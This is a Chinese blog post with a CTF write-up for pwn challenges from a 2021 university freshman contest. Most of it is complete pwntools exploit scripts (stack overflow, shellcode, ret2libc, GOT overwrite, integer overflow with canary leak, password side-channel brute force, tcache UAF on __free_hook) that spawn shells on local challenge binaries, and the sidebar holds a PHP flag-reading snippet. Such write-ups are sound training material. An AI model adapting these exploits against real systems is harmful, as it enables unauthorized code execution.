SCU新生赛2021 pwn wp

最新推荐文章于 2022-09-26 17:56:55 发布
最新推荐文章于 2022-09-26 17:56:55 发布
阅读量4.2k 收藏 1
点赞数
分类专栏: wp 文章标签: pwn
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Invin_cible/article/details/121614842
版权

前段时间的极客大挑战2021和2021年的SCU新生赛,最后一道题都没有做出来,作为一枚大二学长确实应该反省一下自己了。太菜了呜呜呜。极客大挑战因为打太久了,题目都快忘记了,就不写wp了。

ret2text

简单的栈溢出,pwn里的hello world。

from pwn import *

r = process("/mnt/hgfs/ubuntu/stackoverflow")
elf = ELF("/mnt/hgfs/ubuntu/stackoverflow")
payload = b'a'*0x38+p64(elf.symbols["backdoor"])
r.recvuntil(b"Do you know stack overflow and ret2text?")
r.sendline(payload)
io.interactive()

ret2shellcode

最基础的shellcode,可以自己写,也可以直接用pwntools里的shellcraft模块

from pwn import *
context(arch="amd64",os="linux")
r = process("/mnt/hgfs/ubuntu/ret2shellcode")
r.recvuntil(b"Your input will be saved at ")
shellcode_addr = int(r.recvuntil(b'\n'),16)
shellcode = asm(shellcraft.sh())
r.recvuntil("Input: ")
payload = shellcode.ljust(0x88,b'a')+p64(shellcode_addr)
r.sendline(payload)
r.interactive()

quiz

在线测试题,主要考察整数溢出和汇编的问题。

ret2libc

链接:https://pan.baidu.com/s/1T94IbzZpAWCherOfZl5xQw
提取码:F1re

checksec一下,除了canary保护外全开。

思路

0x1地址泄露

1

choice选择1后可以泄露一些地址,其中泄露了一个函数的地址,和puts函数的地址,可以通过这两个得到elf文件基址和libc基址。

0x2栈溢出

2

然后就是choice选择2后一个明显的栈溢出漏洞。

不过这道题有点搞的是,我用system+/bin/sh的方式不能getshell,最后用one_gadget成功getshell。最后注意用一个ret指令平衡栈帧。

exp

from pwn import *
libc = ELF('/mnt/hgfs/ubuntu/ret2libc/libc-2.23.so')
# r = process('/mnt/hgfs/ubuntu/ret2libc/ret2libc')

r.recvuntil("Your choice: ")
r.sendline(b'1')
r.recvuntil("You need to figure it out:")
r.recvuntil("0xdeadbeef ")
elf_addr = int(r.recv(14),16)
elf_base = elf_addr-0x13d3
r.recv(1)
puts_addr=int(r.recv(14),16)
print(hex(puts_addr))
libc_base=puts_addr-libc.symbols["puts"]
system_addr = libc_base+libc.symbols["system"]
bin_sh = 0x18ce57
one_gadget = libc_base+0xf03a4
pop_rdi = 0x1613+elf_base
ret = elf_base+0x101a
print("elf_base:"+hex(elf_base))
print("libc_base: "+hex(libc_base))
r.recvuntil("Your choice: ")
# payload = b'a'*0x18+p64(ret)+p64(pop_rdi)+p64(bin_sh)+p64(system_addr)
payload =b'a'*0x18+p64(ret)+p64(one_gadget)
r.sendline(b'2')
r.recvuntil("input: ")
r.sendline(payload)
r.interactive()

got_it

链接:https://pan.baidu.com/s/1V9_FA8XIHravKt9ZtXhQIw
提取码:F1re

checksec一下,除了RELEO保护,其他保护全开。

函数定义了一个数组,数组储存了几个学pwn的经典网站,函数有三个功能:

  • show:展示数组内某一个网站的网址。

  • edit:修改某一个网址的内容。但是可以看到输入长度0x12大于其数组元素长度0x8,存在溢出。

  • exit:退出程序。

思路

0x1溢出

3

存在0x8的溢出长度。

0x2控制函数指针

4

其中0x36E0后储存的是数组变量的地址。

而0x36E0前储存的是数组变量。

结合之前我们发现的0x8的溢出长度,可以对0x36D0处最后一个网址使用edit函数,可覆写到储存第一个数组元素的指针。

0x3 pie绕过,改写GOT表

由于程序未开RELEO保护,我们可以考虑改写函数GOT表,又由于程序开了pie保护,我们打算用partial write绕过。

5

发现atoi_addr与第一个函数指针之间只有最后一个字节不一样。因此我们只用覆写指针第一个字节为’\x40’。利用show函数泄露函数真实地址,从而计算出libc基址,然后再edit数组第一个元素,即可把atoi_got改写为one_gadget的值。

exp

from pwn import *
# r = process('/mnt/hgfs/ubuntu/got_it/got_it')
elf = ELF('/mnt/hgfs/ubuntu/got_it/got_it')
libc = ELF('/mnt/hgfs/ubuntu/got_it/libc-2.23.so')

def show(id):
    r.recvuntil("> ")
    r.sendline(str(1))
    r.recvuntil("which? ")
    r.sendline(str(id))

def edit(id,content):
    r.recvuntil("> ")
    r.sendline(str(2))
    r.recvuntil("which? ")
    r.sendline(str(id))
    r.recvuntil("your new website: ")
    r.send(content)
payload = b'a'*0x10+b'\x40'
edit(4,payload)
show(0)
r.recvuntil("website: ")
atoi_addr = u64(r.recv(6).ljust(8,b'\0'))
print("atoi_got: "+hex(atoi_addr))
libc_base = atoi_addr - libc.symbols["atoi"]
print("libc_base: "+hex(libc_base))
one_gadget = 0xf1247+libc_base
payload2= p64(one_gadget)
edit(0,payload2)
r.interactive()

safe_copy

链接:https://pan.baidu.com/s/1HFxgh0mnrWJt76LBc9t9pw
提取码:F1re

真丶题如其意。checksec,保护全开。

IDA反汇编出来代码有点乱,花了半个小时才大概理解程序流程。

函数主要流程是

  • 读取0x100大小的内容到buf数组中,读取offset,Max_copylen,boundary三个属性。

  • 初始化0x10大小的s数组,全用“#”填充,同时将s数组相邻的0x90大小的栈空间内也全用“#”填充。

  • 读取copy_len,开始从buf数组中向s数组中copy。

  • offset确定了从s数组的第几个下标开始copy,max_copylen确定了最大copy长度,boundary定义的则是最多能够copy到的s数组的最大下标。

以上的程序流程可以不断重复,直到输入到buf数组中的值为"exit \n"。

理解程序流程后,我们可以基本肯定漏洞只能从几个参数:offset,Max_copylen,boundary,copy_len几个参数上动手脚。因此我着重查看处理那几个参数的函数,并且检查参数本身逻辑并没问题,那么漏洞基本上只能出在整数溢出上。

思路

0x1整数溢出

10

显然我们是想控制offset的值,达到copy到栈溢出的位置。检查到

if ( offset < 0 || boundary > 0x100 || max_copylen <= 0 || offset + max_copylen >= (int)boundary )

发现offset与max_copylen均为int型变量,且max_copylen对程序copy流程无太大影响,因此我们可以令max_copylen为接近INT_MAX的值,利用整数溢出使得满足offset + max_copylen <= (int)boundary,并且也可以控制offset的值。

0x2泄露canary与libc基址

6

可以观察到在s数组下方0x8地址处存在canary值与libc_start_main_240的地址,

由于canary第一位是’\0’,覆盖到canary第一位后,可以通过程序流程中的put泄露出canary,**使用rjust补足canary。**同时用相同方法泄露libc_start_main_240的地址,计算出libc基址,最后栈溢出getshell。

最后在退出的时候倒是卡了半天…需要在buf数组开头写入"exit\n",且加上"\0"进行隔断

exp

from pwn import *
context.log_level = 'debug'
# r = process('/mnt/hgfs/ubuntu/safe_copy/safe_copy')
elf = ELF('/mnt/hgfs/ubuntu/safe_copy/safe_copy')
libc = ELF('/mnt/hgfs/ubuntu/safe_copy/libc-2.23.so')

def copy(padding,start_offset,length,boundary,copylength):
    r.recvuntil("Your input: ")
    r.sendline(padding)
    r.recvuntil("Start offset: ")
    r.sendline(str(start_offset))
    r.recvuntil("Max copy len: ")
    r.sendline(str(length))
    r.recvuntil("Copy boundary: ")
    r.sendline(str(boundary))
    r.recvuntil("Copy len:")
    r.sendline(str(copylength))

copy(b'aaaaaaaaa' ,0x100,0x7fffffff,11,9)
r.recvuntil("Result:")
r.recvuntil(b"aaaaaaaaa")
canary = u64(r.recv(7).rjust(8,b'\0'))
print("canary : "+hex(canary))
copy(b'aaaaaaaa'*7,0x100,0x7fffffff,100,56)
r.recvuntil(b"aaaaaaaa"*7)
libc_start_main_240 = u64(r.recv(6).ljust(8,b'\0'))
print("libc_start_main_240: "+hex(libc_start_main_240))
libc_base = libc_start_main_240-libc.symbols["__libc_start_main"]-240
print("libc_base: "+hex(libc_base))
one_gadget = libc_base+0x45226
payload = p32(1953069157)+b'\n'+b'\0'*3+p64(canary)+b'a'*0x28+p64(one_gadget)
copy(payload,0x100,0x7fffffff,0x100,64)
r.interactive()

login

链接:https://pan.baidu.com/s/1hCcdvfqdlc836UaT7CBGHQ
提取码:F1re

程序流程分析

一道题看一下午,仍然一点思路都没有。

程序流程:

  • 自带一个root用户,id为特殊的0,密码通过linux中的urandom自动生成,每位密码的生成流程为:①从/dev/urandom中读取四位数字作为随机数种子。②调用srand函数。③生成一位密码。④直到生成0x30位密码

  • add user:添加用户,属性有①密码②id③密码长度。(id不能为0)

  • login:用户登入,如果登入的用户为root用户,拥有一个UAF漏洞。

  • delete user:删除用户。

思路

root用户

刚开始我认为root用户的密码在程序启动时就生成,并且每一位密码都有一个随机的种子,所以是无法爆破的。因此只能去将普通用户的id改为0。于是我找了半天整数溢出的漏洞,想要把普通用户的id改为0,最终无疾而终。

直到放出hint:侧信道攻击。

网上百度了一下,侧信道攻击基本=爆破,不过是逐位爆破检查是否成功。

因此我仔细去检查了check(密码检测)函数。

7

发现密码如果错误,会以%s打印出错误密码,%s存在泄露后面数据的可能,因此我去查看了栈空间。

8

如图var_30的值对应check函数中的v7(也就是正确密码的个数)。

那就简单了,逐位爆破密码。

先定义基本函数体:

def add(index,id,password):
    r.sendline(b'1')
    r.recvuntil(b"Input user index: ")
    r.sendline(str(index))
    r.recvuntil(b"Input id: ")
    r.sendline(str(id))
    r.recvuntil(b"Input password len: ")
    r.sendline(str(len(password)))
    r.recvuntil(b"Input password: ")
    r.sendline(password)
    r.recvuntil(b"Add user done!")

def login(id,password):
    r.sendline(b'2')
    r.recvuntil(b"Input user index: ")
    r.sendline(str(id))
    r.recvuntil(b"Input password: ")
    r.sendline(password)

def login1(id,password):
    r.sendline(b'2')
    r.recvuntil(b"Input user index: ")
    r.sendline(str(id))
    r.recvuntil(b"Input password: ")
    r.send(password)

def delete(id):
    r.sendline(b'3')
    r.recvuntil(b"Input user index: ")
    r.sendline(str(id))

爆破密码:

def burpsuit():
    try_pwd = ""
    for i in range(48):
     for j in range(48, 48 + 79):
        if i != 47:
            login(0,try_pwd+ chr(j) + 'a' * (152-(i + 1)))
            r.recvuntil(b'a' * ((152 - (i + 1))))
            number = u8(r.recv(1))
            if number == i + 1:
                try_pwd += chr(j)
                break
        else:
            login(0,try_pwd + chr(j))
            result = r.recv(1)
            if (result != b"W"):
                try_pwd += chr(j)
                break
     print("admin_passwd = " + try_pwd)
    print("ok")

泄露libc基址

进入root用户后,我们可以有一个UAF漏洞。而该题的libc版本较高,存在Tcache机制。因此我们先add 6 个user,并将其全部free,将6个Tcache填满,然后利用root用户的UAF漏洞free一个堆块A,这样堆块A将置入unsortedbin中,而login功能其实变相相当于show功能,因此我们可以利用UAF漏洞提取unsortedbin中的fd指针,而fd指针指向的地址与main_arena有固定偏移:

9

故可以泄露出libc基址。

for i in range(1,8):
    add(i,i,b'N1rvana')
for i in range(1,8):
    delete(i)
burpsuit()
r.recvuntil("Input victim index: ")
r.sendline(b'0')
r.recvuntil("Haha. Let's see what will happen.")
libc_base=leak_libc_base()

需要注意的是,用login函数爆破libc基址时需要注意一些特殊字节:

①"\0"字节,若是爆破字节中出现"\0"字节,则由于%s的特性,输出到"\0"就会终止,不能回显正确密码个数。

由于:

    if ( *(_BYTE *)buf == 10 )
    {
      *(_BYTE *)buf = 0;
      return i;
    }

②"\n"字节,输入"\n"字节密码输入直接终止。

因此我的leak_libc_base函数:

def leak_libc_base():
    try_base=""
    for i in range(6):
     for j in range(1,0xff):
          if j!=10:
            payload = try_base+chr(j)+ 'a' * (152-i-1)
            login(0,payload)
            r.recvuntil(b'a' * (152 - i-1))
            # r.recvuntil("\n")
            number = u8(r.recv(1))
            print(number)
            if number == i + 1:
                try_base = try_base+chr(j)
                break
     
    try_base =u64(try_base.ljust(8,'\0'))
    libc_base=try_base-0x3ebca0
    print(hex(libc_base))
    return libc_base

Tcache UAF attack

然后我就不会做了…呜呜呜。

看了wp之后知道是Tcache UAF attack。然后补足了拼图的最后一小块。

直接打free_hook。

exp

from pwn import *
from ctypes import *

# context.log_level = 'debug'
r = process('/mnt/hgfs/ubuntu/login/login')
elf = ELF('/mnt/hgfs/ubuntu/login/login')
libc = ELF('/mnt/hgfs/ubuntu/login/libc_login.so')

def add(index,id,password):
    r.sendline(b'1')
    r.recvuntil(b"Input user index: ")
    r.sendline(str(index))
    r.recvuntil(b"Input id: ")
    r.sendline(str(id))
    r.recvuntil(b"Input password len: ")
    r.sendline(str(len(password)))
    r.recvuntil(b"Input password: ")
    r.sendline(password)
    r.recvuntil(b"Add user done!")

def login(id,password):
    r.sendline(b'2')
    r.recvuntil(b"Input user index: ")
    r.sendline(str(id))
    r.recvuntil(b"Input password: ")
    r.sendline(password)

def login1(id,password):
    r.sendline(b'2')
    r.recvuntil(b"Input user index: ")
    r.sendline(str(id))
    r.recvuntil(b"Input password: ")
    r.send(password)

def delete(id):
    r.sendline(b'3')
    r.recvuntil(b"Input user index: ")
    r.sendline(str(id))

def burpsuit():
    try_pwd = ""
    for i in range(48):
     for j in range(48, 48 + 79):
        if i != 47:
            login(0,try_pwd+ chr(j) + 'a' * (152-(i + 1)))
            r.recvuntil(b'a' * ((152 - (i + 1))))
            number = u8(r.recv(1))
            if number == i + 1:
                try_pwd += chr(j)
                break
        else:
            login(0,try_pwd + chr(j))
            result = r.recv(1)
            if (result != b"W"):
                try_pwd += chr(j)
                break
     print("admin_passwd = " + try_pwd)
    print("ok")

def leak_libc_base():
    try_base=""
    for i in range(6):
     for j in range(1,0xff):
          if j!=10:
            payload = try_base+chr(j)+ 'a' * (152-i-1)
            login(0,payload)
            r.recvuntil(b'a' * (152 - i-1))
            # r.recvuntil("\n")
            number = u8(r.recv(1))
            print(number)
            if number == i + 1:
                try_base = try_base+chr(j)
                break
     
    try_base =u64(try_base.ljust(8,'\0'))
    libc_base=try_base-0x3ebca0
    print(hex(libc_base))
    return libc_base
for i in range(1,8):
    add(i,i,b'N1rvana')
for i in range(1,8):
    delete(i)
burpsuit()
r.recvuntil("Input victim index: ")
r.sendline(b'0')
r.recvuntil("Haha. Let's see what will happen.")
libc_base=leak_libc_base()
for i in range(1,8):
    add(i,i,b'N1rvana')
add(8,8,b'invincible')
delete(8)
delete(0)
add(9,9,p64(libc_base+libc.symbols["__free_hook"]))
add(10,10,b'/bin/sh')
add(11,11,p64(libc_base+libc.symbols["system"]))
delete(10)
r.interactive()
Loτυs
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
SCU.zip_scu_scu底层
09-14
仿真机器人底层平台的一些基本函数以及已经写好的底层
英招杯 pwn2(ret2shellcode)
qq_53928256的博客
11-16 276
由于程序运行时,即输出了输入值s的存放首地址,我们输入的首地址与shellcode之间的距离是0x3c-0x28=0x14,故只需返回s的首地址加上0x14即可;我们分析main函数的时候可以看到栈中的s距离rbp还有一段距离,且程序的NX保护未开启,我们可以考虑写入shellcode在栈中执行。根据图中与rbp的偏移,我们相对比较容易的出var_30对应的变量为v5,var_8对应的变量为v10。在网上我们可以查到相对较短的syscall系统调用的shellcode为23字节,满足我们所需的要求。
2021dasctf七月 pwn题解复现(strdup,md5,protect,setcontext)
weixin_46521144的博客
08-09 875
前言:算是第一次参加自己觉得能力匹配的比之前的0ctf,tctf的,感觉自己就像个混子,2021参加的时候全程都在学没学过的堆,所以其实也没觉得自己能力赶得上。然而第一次打比嘛,总归是不可能会做的,不过也算是知道了,比也没有想象中的那么恐怖。 本篇文章参考的wp https://kr0emer.com/2021/08/04/DASCTF%20July%20X%20CBCTF%204th%20pwn/ Easyheap 保护全开,也开了沙箱,但是同时也开了一块RWX的段,地址是固定的0x233300
2021 强网杯 [强网先锋] shellcode
yongbaoii的博客
06-23 968
就是写入shellcode跑就行。但是shellcode不能有小于’\x1f’,也不能有等于‘\x7f’。问题的关键在于开了沙箱。 只能使用这些系统调用。
2021第十四届全国大学生信息安全竞WP(CISCN)-- pwn部分
热门推荐
lifanxin的博客
05-17 1万+
CISCN_2021_WP概述ciscn_2021_lonelywolf总结 概述   作为学习不到一年的练习生,今年第一次参加国,本以为题目会比较温柔,但是最后只做出了一道pwn题,本来还有两道pwn题是有机会的,但还是缺少一些知识或者技巧吧,没做出来,然后就结束了。本次国pwn题出了一道arm 64位结构的,其余都是正常的linux下pwn题,使用libc-2.27.so,有一道考了沙箱机制。 ciscn_2021_lonelywolf   ciscn_2021_lonelywolf   libc-
字符串溢出(pwn溢出)--ret2shellcode
莫慌的博客
09-26 2005
pwn 入门
CJ1W-SCU模块协议宏做Modbus-RTU主站
最新发布
08-17
CJ1W-SCU模块协议宏做Modbus-RTU主站
DICOM测试工具(SCU
05-28
支持Echo/Store to PACS/Query to PACS/Query worklist/DICOM Print.可用于对自己开发的DICOM SCP程序测试
Source.Tricoview_code_scu_
10-03
Componente para calcular equacion source
Storage SCU Emulator
12-19
Storage SCU Emulator
ciscn2021pwn部分wp
eeeeeight的博客
05-17 1120
ciscn2021 感谢wepn的队友 Column: May 17, 2021 pwny: 首先ida看一眼发现read文件描述符全是3, 好像是读个随机数, 然后我们在3的地址上连着用Write读两次就可以把他变成0, 就可以写入内存了, 后面就是数组越界写, 负数可以往前面读读出libc偏移和pie偏移, 在得到libc之后可以获得环境变量environ的地址, 之后通过(libc_base+libc.sym[‘environ’]-pie_base-0x202060)/8, 就可以得到其位置是数组
强网杯2021CTF 强网先锋shellcode侧信道攻击复现
qq_39948058的博客
08-27 1230
前言:由于个别原因这个比忘记参加了,所以后挑选了一道测信道攻击的题来进行复现,这个题开启了沙盒,采用测信道爆破flag,大概思路:使用retf切换到32位open来进行open('./flag'),retfq再回到64位的write和read就可以了,此题禁用了open所以使用32位的open,如果禁用了write就使用32位的write,同理,具体代码分析,懂汇编就能看懂这里就不赘述了,参考了别的大佬的exp,大概就是这样写的,至于系统调用号可以参考前篇调用号文章 exp: from pwn i
2021 天翼杯 pwn ezshell
yongbaoii的博客
09-24 969
逻辑简单,开了一个可以rwx的页,我们输入一段shellcode,绕过一些检查,开了沙箱,最后执行它。 一点一点来,首先我们输入shellcode之后函数__ctype_b_loc函数是干嘛的? 我们去读源码,在ctype/ctype.h #ifndef _ISbit /* These are all the characteristics of characters. If there get to be more than 16 distinct characteristics, many.
pwn刷题num30----栈溢出修改栈上参数 或 mprotect修改内存权限 + ret2shellcode
tbsqigongzi的博客
04-27 1861
BUUCTF-PWN-get_started_3dsctf_2016 首先查保护–>看链接类型–>赋予程序可执行权限–>试运行 32位程序,小端序 开启部分RELRO-----got表仍可写 未开启canary保护-----存在栈溢出 开启NX保护-----堆栈不可执行 未开启PIE-----程序地址为真实地址 静态链接 Qual a palavrinha magica? 中文意思是 什么是神奇的词? 很奇怪,ida看一下伪代码 栈溢出,gets函数输入字符串给v4,未限制输入的
pwn题shellcode收集
lifanxin的博客
02-25 4466
Write Upshellcode shellcode 这里对pwn中使用到的shellcode做了一个汇总,方便大家参考和使用。 # 32位 短字节shellcode --> 21字节 \x6a\x0b\x58\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x31\xc9\xcd\x80 # 32位 纯ascii字符shellcode PYIIIIIIIIIIQZVTX30VX4AP0A3HH0A00ABAABTAAQ2AB2BB0
2021 DASCTF Sept X 浙江工业大学秋季挑战 pwn hehepwn
yongbaoii的博客
09-27 386
利用格式化字符串泄露canary再ret2libc就可以了。 开了沙箱,可以先mprotect一下,再用shellcode来orw。 exp from pwn import* context.log_level='debug' context.arch='amd64' context.os = "linux" context.terminal = ["tmux", "splitw", "-h"] local = 1 if local: r = process('./1111111') els.
[ACTF2020 新生] web题-Upload
BROTHERYY的博客
07-09 481
复现环境:buuoj.cn 开题漆黑一片,注意观察中间,有个灯泡,鼠标移动上去以后会有上传的提示 查看下页面代码,发现有前端js验证 删除以后,发现很多都无法上传,最后phtml能够上传成功,这里可以不用GIF文件头 访问地址,蚁剑连接 也可以直接在phtml里面添加 <script language='php'>system('cat /flag');</script> 直接在访问上传的文件名的时候就读出flag. ...
BUUCTF——web([极客大挑战 2019]Secret File、[ACTF2020 新生]Exec、[极客大挑战 2019]LoveSQL)
LizePing_的博客
07-16 938
BUUCTF-web[极客大挑战 2019]Secret File做题思路[ACTF2020 新生]Exec做题思路[极客大挑战 2019]LoveSQL做题思路 [极客大挑战 2019]Secret File 做题思路 所以说,江路远 是谁啊?? 根据元素里面提示,我们去这个页面看一看 有点恐怖啊兄弟们,来到了这个页面。我们继续深究下 点secret,接着看,。 然后他告诉查阅结束,关键提示点来了啊。他说没看清???那肯定是我们忽略了什么。 再来一遍,。这回我们抓包。看看每个包里的内容。在一个重
BUUCTF:[ACTF新生2020]swp
末初的CSDN博客
07-23 3872
BUUCTF:[ACTF新生2020]swp
dicom scu 模拟
07-25
模拟DICOM SCU是指在测试或开发过程中,使用模拟的SCU设备与其他DICOM设备进行通信和交互。 模拟DICOM SCU主要通过以下步骤实现: 1. 配置模拟SCU设备的参数:包括设备的IP地址、端口号、传输协议等。这些参数需要...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值